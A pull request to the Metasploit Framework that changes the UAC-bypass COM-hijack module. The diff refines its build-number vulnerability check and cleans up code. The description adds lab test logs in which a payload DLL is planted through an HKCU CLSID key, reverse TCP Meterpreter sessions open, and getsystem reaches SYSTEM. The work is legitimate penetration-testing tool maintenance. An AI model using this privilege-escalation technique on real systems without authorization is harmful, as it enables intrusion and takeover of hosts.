### PR TITLE
Update check comhijack

### DIFF
--- a/modules/exploits/windows/local/bypassuac_comhijack.rb
+++ b/modules/exploits/windows/local/bypassuac_comhijack.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Post::Windows::Priv
   include Post::Windows::Registry
   include Post::Windows::Runas
@@ -63,11 +64,24 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled?
-      Exploit::CheckCode::Appears
-    else
-      Exploit::CheckCode::Safe
+    vprint_status("System OS Detected: #{sysinfo['OS']}")
+    #return CheckCode::Safe('UAC is not enabled') unless is_uac_enabled?
+    if sysinfo['OS'] =~ /Windows (7|8|2008|2012)/
+      return CheckCode::Appears
     end
+    if sysinfo['OS'] =~ /Windows (10|2016)/
+      sysinfo_value = sysinfo['OS']
+      build_num_arr = sysinfo_value.split('Build')
+      return CheckCode::Safe("Unable to determine build Number") if build_num_arr.length < 2
+      build_num = build_num_arr[1].to_i
+      vprint_status("Detected build number: #{build_num}")
+      if build_num < 18362
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    end
+    return CheckCode::Safe
   end
 
   def exploit
@@ -115,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Local
       write_file(dll_name, payload)
       register_file_for_cleanup(dll_name)
 
-      print_status("Executing high integrity process ...")
+      print_status("Executing high integrity process #{expand_path(hijack[:cmd_path])}")
       args = "/c #{expand_path(hijack[:cmd_path])}"
       args << " #{hijack[:cmd_args]}" if hijack[:cmd_args]
 
@@ -128,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Local
 
       handler(client)
     ensure
-      print_status("Cleaning up registry ...")
+      print_status("Cleaning up registry; this can take some time...")
       registry_deletekey(hijack[:root_key], registry_view)
     end
   end
@@ -186,10 +200,6 @@ class MetasploitModule < Msf::Exploit::Local
     # Check if you are an admin
     vprint_status('Checking admin status...')
     admin_group = is_in_admin_group?
-
-    unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
-    end
 
     unless is_in_admin_group?
       fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

--- a/modules/exploits/windows/local/bypassuac_comhijack.rb
+++ b/modules/exploits/windows/local/bypassuac_comhijack.rb
@@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Local
   include Post::Windows::Runas
   include Exploit::FileDropper
 
-  CLSID_PATH = "HKCU\\Software\\Classes\\CLSID"
-  DEFAULT_VAL_NAME = '' # This maps to "(Default)"
+  CLSID_PATH = 'HKCU\\Software\\Classes\\CLSID'.freeze
+  DEFAULT_VAL_NAME = ''.freeze # This maps to "(Default)"
 
   def initialize(info = {})
     super(
@@ -52,6 +52,11 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf']
         ],
         'DisclosureDate' => '1900-01-01',
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -65,14 +70,16 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     vprint_status("System OS Detected: #{sysinfo['OS']}")
-    #return CheckCode::Safe('UAC is not enabled') unless is_uac_enabled?
+    # return CheckCode::Safe('UAC is not enabled') unless is_uac_enabled?
     if sysinfo['OS'] =~ /Windows (7|8|2008|2012)/
       return CheckCode::Appears
     end
+
     if sysinfo['OS'] =~ /Windows (10|2016)/
       sysinfo_value = sysinfo['OS']
       build_num_arr = sysinfo_value.split('Build')
-      return CheckCode::Safe("Unable to determine build Number") if build_num_arr.length < 2
+      return CheckCode::Safe('Unable to determine build Number') if build_num_arr.length < 2
+
       build_num = build_num_arr[1].to_i
       vprint_status("Detected build number: #{build_num}")
       if build_num < 18362
@@ -114,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
-    payload = generate_payload_dll({ :dll_exitprocess => true })
+    payload = generate_payload_dll({ dll_exitprocess: true })
     commspec = expand_path('%COMSPEC%')
     dll_name = expand_path("%TEMP%\\#{rand_text_alpha(8)}.dll")
     hijack = hijack_com(registry_view, dll_name)
@@ -138,11 +145,11 @@ class MetasploitModule < Msf::Exploit::Local
       client.sys.process.execute(commspec, args, { 'Hidden' => true })
 
       # Wait a copule of seconds to give the payload a chance to fire before cleaning up
-      Rex::sleep(5)
+      Rex.sleep(5)
 
       handler(client)
     ensure
-      print_status("Cleaning up registry; this can take some time...")
+      print_status('Cleaning up registry; this can take some time...')
       registry_deletekey(hijack[:root_key], registry_view)
     end
   end
@@ -209,12 +216,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]


### PR DESCRIPTION
Fixes https://github.com/rapid7/metasploit-framework/issues/16216

This improves the check method for `exploit/windows/local/bypassuac_comhijack` by verifying build numbers for windows 10 and 2016+ server editions.  It also adds the autocheck changes and includes a rubocop cleanup.

## Testing

- [x] Get a Meterpreter session on a windows 7-10 v21H2 workstation and/or Server system.
- [x] `use exploit/windows/local/bypassuac_comhijack`
- [x] `set session <session>`
- [x] Verify Windows version prior to 10 v 1903 (Build 18362) are vulnerable through the check method and get an elevated session.
- [x] Repeat for different targets

## Windows 7
```
msf6 exploit(windows/local/bypassuac_comhijack) > check

[*] System OS Detected: Windows 7 (6.1 Build 7601, Service Pack 1).
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 7 (6.1 Build 7601, Service Pack 1).
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\vTaDaQNy.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200262 bytes) to 10.5.132.160
[*] Cleaning up registry; this can take some time...
[*] Meterpreter session 23 opened (10.5.135.101:4444 -> 10.5.132.160:49180 ) at 2022-03-03 12:49:21 -0600
[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\vTaDaQNy.dll: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > sysinfo
Computer        : WIN7X64-SP1
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN7X64-SP1\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```

## Windows 10 v1809
```
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 10 (10.0 Build 17763).
[*] Detected build number: 17763
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\FAiHLtSt.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200262 bytes) to 10.5.132.104
[*] Cleaning up registry ...
[*] Meterpreter session 21 opened (10.5.135.101:4444 -> 10.5.132.104:49680 ) at 2022-03-03 12:36:10 -0600

meterpreter > sysinfo
Computer        : DESKTOP-6G879SE
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-6G879SE\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```
## Windows Server 2019
```
msf6 exploit(windows/local/bypassuac_comhijack) > sessions -i 18
[*] Starting interaction with 18...

meterpreter > sysinfo
Computer        : WIN-2E6BPFGP9F7
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-2E6BPFGP9F7\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 18...
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Checking admin status...
[*] System OS Detected: Windows 2016+ (10.0 Build 17763).
[*] Detected build number: 17763
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\wCbobiAc.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200262 bytes) to 10.5.132.126
[*] Cleaning up registry ...
[*] Meterpreter session 19 opened (10.5.135.101:4444 -> 10.5.132.126:49684 ) at 2022-03-03 12:19:14 -0600

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

```
### Windows 10x64 1909
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-EHIBEQF
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-EHIBEQF\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/bypassuac_comhijack 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/bypassuac_comhijack) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_comhijack) > set verbose true
verbose => true
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 10 (10.0 Build 18363).
[*] Detected build number: 18363
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > 


```
